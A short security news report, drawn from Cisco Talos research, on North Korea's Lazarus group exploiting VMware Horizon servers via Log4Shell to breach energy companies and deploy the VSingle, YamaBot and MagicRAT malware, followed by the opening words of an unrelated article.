The North Korean APT group ‘Lazarus’ (APT38) is exploiting VMWare Horizon servers to access the corporate networks of energy providers in the United States, Canada, and Japan. Lazarus is a state-backed threat actor known for conducting espionage, data theft, and cryptocurrency stealing campaigns over the past decade. The threat actors are responsible for hundreds of sophisticated attacks internationally. According to researchers at Cisco Talos who uncovered the latest operation, Lazarus targeted energy organizations between February and July 2022, leveraging public VMWare Horizon exploits for initial access. From there, they used custom malware families like ‘VSingle’ and ‘YamaBot’ and a previously unknown Remote Access Trojan (RAT) named ‘MagicRAT’ to search for and steal data from infected devices. Cisco Talos presents several attack strategies that illustrate Lazarus’ latest techniques, tactics, and procedures (TTPs) and highlight the versatility of the sophisticated hacking group. In the first case, the threat actors exploit VMWare servers vulnerable to Log4Shell flaws to run shellcode that establishes a reverse shell for running arbitrary commands on the compromised endpoint. In the second case presented in the report, which concerns a different victim, the initial access and reconnaissance follow similar patterns, but this time, the hackers dropped MagicRAT along with VSingle. In the third intrusion case, Lazarus deployed YamaBot, a custom malware written in Go, featuring standard RAT capabilities. The idea behind these variations is to mix up TTPs and make attribution, detection, and defense more challenging for incident responders. As highlighted in this report, Lazarus is closely monitored by cybersecurity firms, so they can’t afford to become lazy in diversifying their attack chains.
By Anthony Zampino Introduction Leading up to the most recent Russian invasion of Ukraine in